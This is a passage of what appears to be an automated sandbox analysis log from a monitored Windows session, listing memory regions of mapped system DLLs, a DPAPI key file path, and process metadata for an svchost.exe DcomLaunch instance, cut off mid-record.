start_va = 0x7ffaf3c40000 end_va = 0x7ffaf3c9efff entry_point = 0x7ffaf3c40000 region_type = mapped_file name = "msv1_0.dll" filename = "\\Windows\\System32\\msv1_0.dll" (normalized: "c:\\windows\\system32\\msv1_0.dll") Region: id = 3593 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3594 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3595 start_va = 0x7ffaf3d20000 end_va = 0x7ffaf3d47fff entry_point = 0x7ffaf3d20000 region_type = mapped_file name = "kerbclientshared.dll" filename = "\\Windows\\System32\\KerbClientShared.dll" (normalized: "c:\\windows\\system32\\kerbclientshared.dll") Region: id = 3596 start_va = 0x7ffaf3d50000 end_va = 0x7ffaf3e43fff entry_point = 0x7ffaf3d50000 region_type = mapped_file name = "kerberos.dll" filename = "\\Windows\\System32\\kerberos.dll" (normalized: "c:\\windows\\system32\\kerberos.dll") Region: id = 3597 start_va = 0x7ffaf3e50000 end_va = 0x7ffaf3e63fff entry_point = 0x7ffaf3e50000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 3598 start_va = 0x7ffaf3e70000 end_va = 0x7ffaf3e98fff entry_point = 0x7ffaf3e70000 region_type = mapped_file name = "negoexts.dll" filename = "\\Windows\\System32\\negoexts.dll" (normalized: "c:\\windows\\system32\\negoexts.dll") Region: id = 3599 start_va = 0x7ffaf3ea0000 end_va = 0x7ffaf3ec0fff entry_point = 0x7ffaf3ea0000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 3600 start_va = 0x7ffaf3ed0000 end_va = 0x7ffaf3f05fff entry_point = 0x7ffaf3ed0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 3601 start_va = 0x7ffaf3f10000 end_va = 0x7ffaf3fe5fff entry_point = 0x7ffaf3f10000 region_type = mapped_file name = "samsrv.dll" filename = "\\Windows\\System32\\samsrv.dll" (normalized: "c:\\windows\\system32\\samsrv.dll") Region: id = 3602 start_va = 0x7ffaf3ff0000 end_va = 0x7ffaf4153fff entry_point = 0x7ffaf3ff0000 region_type = mapped_file name = "lsasrv.dll" filename = "\\Windows\\System32\\lsasrv.dll" (normalized: "c:\\windows\\system32\\lsasrv.dll") Region: id = 3603 start_va = 0x7ffaf4160000 end_va = 0x7ffaf416bfff entry_point = 0x7ffaf4160000 region_type = mapped_file name = "sspisrv.dll" filename = "\\Windows\\System32\\sspisrv.dll" (normalized: "c:\\windows\\system32\\sspisrv.dll") Region: id = 3604 start_va = 0x7ffaf4170000 end_va = 0x7ffaf417afff entry_point = 0x7ffaf4170000 region_type = mapped_file name = "ntlmshared.dll" filename = "\\Windows\\System32\\NtlmShared.dll" (normalized: "c:\\windows\\system32\\ntlmshared.dll") Region: id = 3605 start_va = 0x7ffaf4180000 end_va = 0x7ffaf41a5fff entry_point = 0x7ffaf4180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 3606 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3607 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3608 start_va = 0x7ffaf41f0000 end_va = 0x7ffaf4204fff entry_point = 0x7ffaf41f0000 region_type = mapped_file name = "netprovfw.dll" filename = "\\Windows\\System32\\netprovfw.dll" (normalized: "c:\\windows\\system32\\netprovfw.dll") Region: id = 3609 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3610 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3611 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3612 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3613 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3614 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3615 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3616 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3617 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3618 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3619 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3620 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3621 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3622 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3623 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3624 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3625 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3626 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6482 start_va = 0x31bae20000 end_va = 0x31bae20fff entry_point = 0x31bae20000 region_type = mapped_file name = "5b8a3202-35dc-4437-b5d7-374f5e872415" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") Region: id = 6483 start_va = 0x31bae20000 end_va = 0x31bae20fff entry_point = 0x0 region_type = private name = "private_0x00000031bae20000" filename = "" Region: id = 6561 start_va = 0x31bae20000 end_va = 0x31bae9ffff entry_point = 0x0 region_type = private name = "private_0x00000031bae20000" filename = "" Region: id = 6562 start_va = 0x7ff6810ec000 end_va = 0x7ff6810edfff entry_point = 0x0 region_type = private name = "private_0x00007ff6810ec000" filename = "" Thread: id = 350 os_tid = 0xdb8 Thread: id = 351 os_tid = 0x228 Thread: id = 352 os_tid = 0x214 Thread: id = 353 os_tid = 0x210 Thread: id = 354 os_tid = 0x20c Thread: id = 355 os_tid = 0x208 Thread: id = 356 os_tid = 0x1f0 Thread: id = 828 os_tid = 0xf0c Process: id = "40" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x490be000" os_pid = "0x240" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BrokerInfrastructure" [0xa], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\DeviceInstall" [0xa], "NT SERVICE\\LSM" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT SERVICE\\SystemEventsBroker" [0xa], "NT AUTHORITY\\Logon Session 00000000:000063b5" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5054 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5055 start_va = 0xdbba060000 end_va = 0xdbba06ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba060000" filename = "" Region: id = 5056 start_va = 0xdbba070000 end_va = 0xdbba074fff entry_point = 0x0 region_type = private name = "private_0x000000dbba070000" filename = "" Region: id = 5057 start_va = 0xdbba080000 end_va = 0xdbba093fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba080000" filename = "" Region: id = 5058 start_va = 0xdbba0a0000 end_va = 0xdbba11ffff entry_point = 0x0 region_type = private name = "private_0x000000dbba0a0000" filename = "" Region: id = 5059 start_va = 0xdbba120000 end_va = 0xdbba123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba120000" filename = "" Region: id = 5060 start_va = 0xdbba130000 end_va = 0xdbba130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba130000" filename = "" Region: id = 5061 start_va = 0xdbba140000 end_va = 0xdbba141fff entry_point = 0x0 region_type = private name = "private_0x000000dbba140000" filename = "" Region: id = 5062 start_va = 0xdbba150000 end_va = 0xdbba20dfff entry_point = 0xdbba150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5063 start_va = 0xdbba210000 end_va = 0xdbba28ffff entry_point = 0x0 region_type = private name = "private_0x000000dbba210000" filename = "" Region: id = 5064 start_va = 0xdbba290000 end_va = 0xdbba290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba290000" filename = "" Region: id = 5065 start_va = 0xdbba2a0000 end_va = 0xdbba2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba2a0000" filename = "" Region: id = 5066 start_va = 0xdbba2b0000 end_va = 0xdbba2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba2b0000" filename = "" Region: id = 5067 start_va = 0xdbba2c0000 end_va = 0xdbba2c6fff entry_point = 0x0 region_type = private name = "private_0x000000dbba2c0000" filename = "" Region: id = 5068 start_va = 0xdbba2d0000 end_va = 0xdbba2d0fff entry_point = 0x0 region_type = private name = "private_0x000000dbba2d0000" filename = "" Region: id = 5069 start_va = 0xdbba2e0000 end_va = 0xdbba2e0fff entry_point = 0x0 region_type = private name = "private_0x000000dbba2e0000" filename = "" Region: id = 5070 start_va = 0xdbba2f0000 end_va = 0xdbba2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba2f0000" filename = "" Region: id = 5071 start_va = 0xdbba300000 end_va = 0xdbba300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbba300000" filename = "" Region: id = 5072 start_va = 0xdbba310000 end_va = 0xdbba316fff entry_point = 0x0 region_type = private name = "private_0x000000dbba310000" filename = "" Region: id = 5073 start_va = 0xdbba320000 end_va = 0xdbba322fff entry_point = 0xdbba320000 region_type = mapped_file name = "lsm.dll.mui" filename = "\\Windows\\System32\\en-US\\lsm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.dll.mui") Region: id = 5074 start_va = 0xdbba330000 end_va = 0xdbba336fff entry_point = 0x0 region_type = private name = "private_0x000000dbba330000" filename = "" Region: id = 5075 start_va = 0xdbba340000 end_va = 0xdbba3bffff entry_point = 0x0 region_type = private name = "private_0x000000dbba340000" filename = "" Region: id = 5076 start_va = 0xdbba3c0000 end_va = 0xdbba3c0fff entry_point = 0xdbba3c0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 5077 start_va = 0xdbba3d0000 end_va = 0xdbba3d6fff entry_point = 0x0 region_type = private name = "private_0x000000dbba3d0000" filename = "" Region: id = 5078 start_va = 0xdbba3e0000 end_va = 0xdbba3e0fff entry_point = 0x0 region_type = private name = "private_0x000000dbba3e0000" filename = "" Region: id = 5079 start_va = 0xdbba3f0000 end_va = 0xdbba3f0fff entry_point = 0x0 region_type = private name = "private_0x000000dbba3f0000" filename = "" Region: id = 5080 start_va = 0xdbba400000 end_va = 0xdbba4fffff entry_point = 0x0 region_type = private name = "private_0x000000dbba400000" filename = "" Region: id = 5081 start_va = 0xdbba500000 end_va = 0xdbba5fffff entry_point = 0x0 region_type = private name = "private_0x000000dbba500000" filename = "" Region: id = 5082 start_va = 0xdbba600000 end_va = 0xdbba6fffff entry_point = 0x0 region_type = private name = "private_0x000000dbba600000" filename = "" Region: id = 5083 start_va = 0xdbba700000 end_va = 0xdbba77ffff entry_point = 0x0 region_type = private name = "private_0x000000dbba700000" filename = "" Region: id = 5084 start_va = 0xdbba780000 end_va = 0xdbba7fffff entry_point = 0x0 region_type = private name = "private_0x000000dbba780000" filename = "" Region: id = 5085 start_va = 0xdbba800000 end_va = 0xdbba8fffff entry_point = 0x0 region_type = private name = "private_0x000000dbba800000" filename = "" Region: id = 5086 start_va = 0xdbba900000 end_va = 0xdbba97ffff entry_point = 0x0 region_type = private name = "private_0x000000dbba900000" filename = "" Region: id = 5087 start_va = 0xdbba980000 end_va = 0xdbbaa7ffff entry_point = 0x0 region_type = private name = "private_0x000000dbba980000" filename = "" Region: id = 5088 start_va = 0xdbbaa80000 end_va = 0xdbbaafffff entry_point = 0x0 region_type = private name = "private_0x000000dbbaa80000" filename = "" Region: id = 5089 start_va = 0xdbbab00000 end_va = 0xdbbab00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbbab00000" filename = "" Region: id = 5090 start_va = 0xdbbab10000 end_va = 0xdbbab10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbbab10000" filename = "" Region: id = 5091 start_va = 0xdbbab20000 end_va = 0xdbbab49fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbbab20000" filename = "" Region: id = 5092 start_va = 0xdbbab80000 end_va = 0xdbbac7ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbab80000" filename = "" Region: id = 5093 start_va = 0xdbbac80000 end_va = 0xdbbad7ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbac80000" filename = "" Region: id = 5094 start_va = 0xdbbad80000 end_va = 0xdbbae7ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbad80000" filename = "" Region: id = 5095 start_va = 0xdbbae80000 end_va = 0xdbbaefffff entry_point = 0x0 region_type = private name = "private_0x000000dbbae80000" filename = "" Region: id = 5096 start_va = 0xdbbaf00000 end_va = 0xdbbaffffff entry_point = 0x0 region_type = private name = "private_0x000000dbbaf00000" filename = "" Region: id = 5097 start_va = 0xdbbb100000 end_va = 0xdbbb436fff entry_point = 0xdbbb100000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5098 start_va = 0xdbbb540000 end_va = 0xdbbb63ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbb540000" filename = "" Region: id = 5099 start_va = 0xdbbb640000 end_va = 0xdbbb6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbbb640000" filename = "" Region: id = 5100 start_va = 0xdbbb700000 end_va = 0xdbbb7fffff entry_point = 0x0 region_type = private name = "private_0x000000dbbb700000" filename = "" Region: id = 5101 start_va = 0xdbbb900000 end_va = 0xdbbb9fffff entry_point = 0x0 region_type = private name = "private_0x000000dbbb900000" filename = "" Region: id = 5102 start_va = 0xdbbba00000 end_va = 0xdbbbafffff entry_point = 0x0 region_type = private name = "private_0x000000dbbba00000" filename = "" Region: id = 5103 start_va = 0xdbbbb00000 end_va = 0xdbbbc87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbbbb00000" filename = "" Region: id = 5104 start_va = 0xdbbbc90000 end_va = 0xdbbbe10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dbbbc90000" filename = "" Region: id = 5105 start_va = 0xdbbbe20000 end_va = 0xdbbbf1ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbbe20000" filename = "" Region: id = 5106 start_va = 0xdbbbf20000 end_va = 0xdbbc01ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbbf20000" filename = "" Region: id = 5107 start_va = 0xdbbc020000 end_va = 0xdbbc09ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbc020000" filename = "" Region: id = 5108 start_va = 0xdbbc2a0000 end_va = 0xdbbc39ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbc2a0000" filename = "" Region: id = 5109 start_va = 0xdbbc3a0000 end_va = 0xdbbc41ffff entry_point = 0x0 region_type = private name = "private_0x000000dbbc3a0000" filename = "" Region: id = 5110 start_va = 0x7df5ff2a0000 end_va = 0x7ff5ff29ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2a0000" filename = "" Region: id = 5111 start_va = 0x7ff787d68000 end_va = 0x7ff787d69fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d68000" filename = "" Region: id = 5112 start_va = 0x7ff787d6a000 end_va = 0x7ff787d6bfff entry_point = 0x0 region_type = private name = "private_0x00007ff787d6a000" filename = "" Region: id = 5113 start_va = 0x7ff787d70000 end_va = 0x7ff787d71fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d70000" filename = "" Region: id = 5114 start_va = 0x7ff787d72000 end_va = 0x7ff787d73fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d72000" filename = "" Region: id = 5115 start_va = 0x7ff787d74000 end_va = 0x7ff787d75fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d74000" filename = "" Region: id = 5116 start_va = 0x7ff787d76000 end_va = 0x7ff787d77fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d76000" filename = "" Region: id = 5117 start_va = 0x7ff787d78000 end_va = 0x7ff787d79fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d78000" filename = "" Region: id = 5118 start_va = 0x7ff787d7c000 end_va = 0x7ff787d7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff787d7c000" filename = "" Region: id = 5119 start_va = 0x7ff787d80000 end_va = 0x7ff787d81fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d80000" filename = "" Region: id = 5120 start_va = 0x7ff787d84000 end_va = 0x7ff787d85fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d84000" filename = "" Region: id = 5121 start_va = 0x7ff787d86000 end_va = 0x7ff787d87fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d86000" filename = "" Region: id = 5122 start_va = 0x7ff787d88000 end_va = 0x7ff787d89fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d88000" filename = "" Region: id = 5123 start_va = 0x7ff787d8a000 end_va = 0x7ff787d8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff787d8a000" filename = "" Region: id = 5124 start_va = 0x7ff787d8c000 end_va = 0x7ff787d8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff787d8c000" filename = "" Region: id = 5125 start_va = 0x7ff787d8e000 end_va = 0x7ff787d8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff787d8e000" filename = "" Region: id = 5126 start_va = 0x7ff787d90000 end_va = 0x7ff787e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787d90000" filename = "" Region: id = 5127 start_va = 0x7ff787e90000 end_va = 0x7ff787eb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787e90000" filename = "" Region: id = 5128 start_va = 0x7ff787eb4000 end_va = 0x7ff787eb5fff entry_point = 0x0 region_type = private name = "private_0x00007ff787eb4000" filename = "" Region: id = 5129 start_va = 0x7ff787eb6000 end_va = 0x7ff787eb7fff entry_point = 0x0 region_type = private name = "private_0x00007ff787eb6000" filename = "" Region: id = 5130 start_va = 0x7ff787eb8000 end_va = 0x7ff787eb9fff entry_point = 0x0 region_type = private name = "private_0x00007ff787eb8000" filename = "" Region: id = 5131 start_va = 0x7ff787eba000 end_va = 0x7ff787ebbfff entry_point = 0x0 region_type = private name = "private_0x00007ff787eba000" filename = "" Region: id = 5132 start_va = 0x7ff787ebc000 end_va = 0x7ff787ebcfff entry_point = 0x0 region_type = private name = "private_0x00007ff787ebc000" filename = "" Region: id = 5133 start_va = 0x7ff787ebe000 end_va = 0x7ff787ebffff entry_point = 0x0 region_type = private name = "private_0x00007ff787ebe000" filename = "" Region: id = 5134 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 5135 start_va = 0x7ffae8170000 end_va = 0x7ffae8185fff entry_point = 0x7ffae8170000 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 5136 start_va = 0x7ffae8200000 end_va = 0x7ffae820bfff entry_point = 0x7ffae8200000 region_type = mapped_file name = "licensemanagerapi.dll" filename = "\\Windows\\System32\\LicenseManagerApi.dll" (normalized: "c:\\windows\\system32\\licensemanagerapi.dll") Region: id = 5137 start_va = 0x7ffae84f0000 end_va = 0x7ffae8504fff entry_point = 0x7ffae84f0000 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 5138 start_va = 0x7ffae8510000 end_va = 0x7ffae851dfff entry_point = 0x7ffae8510000 region_type = mapped_file name = "sebbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\SebBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\sebbackgroundmanagerpolicy.dll") Region: id = 5139 start_va = 0x7ffae8520000 end_va = 0x7ffae8537fff entry_point = 0x7ffae8520000 region_type = mapped_file name = "windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll") Region: id = 5140 start_va = 0x7ffae8540000 end_va = 0x7ffae8556fff entry_point = 0x7ffae8540000 region_type = mapped_file name = "acpbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\ACPBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\acpbackgroundmanagerpolicy.dll") Region: id = 5141 start_va = 0x7ffae8560000 end_va = 0x7ffae856bfff entry_point = 0x7ffae8560000 region_type = mapped_file name = "cbtbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\CbtBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\cbtbackgroundmanagerpolicy.dll") Region: id = 5142 start_va = 0x7ffae8570000 end_va = 0x7ffae857ffff entry_point = 0x7ffae8570000 region_type = mapped_file name = "backgroundmediapolicy.dll" filename = "\\Windows\\System32\\BackgroundMediaPolicy.dll" (normalized: "c:\\windows\\system32\\backgroundmediapolicy.dll") Region: id = 5143 start_va = 0x7ffae8710000 end_va = 0x7ffae8752fff entry_point = 0x7ffae8710000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 5144 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 5145 start_va = 0x7ffaef7b0000 end_va = 0x7ffaef841fff entry_point = 0x7ffaef7b0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 5146 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5147 start_va = 0x7ffaf11d0000 end_va = 0x7ffaf1241fff entry_point = 0x7ffaf11d0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 5148 start_va = 0x7ffaf13a0000 end_va = 0x7ffaf13affff entry_point = 0x7ffaf13a0000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 5149 start_va = 0x7ffaf1610000 end_va = 0x7ffaf161bfff entry_point = 0x7ffaf1610000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 5150 start_va = 0x7ffaf2560000 end_va = 0x7ffaf2627fff entry_point = 0x7ffaf2560000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 5151 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5152 start_va = 0x7ffaf2c10000 end_va = 0x7ffaf2c30fff entry_point = 0x7ffaf2c10000 region_type = mapped_file name = "dab.dll" filename = "\\Windows\\System32\\dab.dll" (normalized: "c:\\windows\\system32\\dab.dll") Region: id = 5153 start_va = 0x7ffaf2c40000 end_va = 0x7ffaf2c7efff entry_point = 0x7ffaf2c40000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 5154 start_va = 0x7ffaf2c80000 end_va = 0x7ffaf2ce1fff entry_point = 0x7ffaf2c80000 region_type = mapped_file name = "systemeventsbrokerserver.dll" filename = 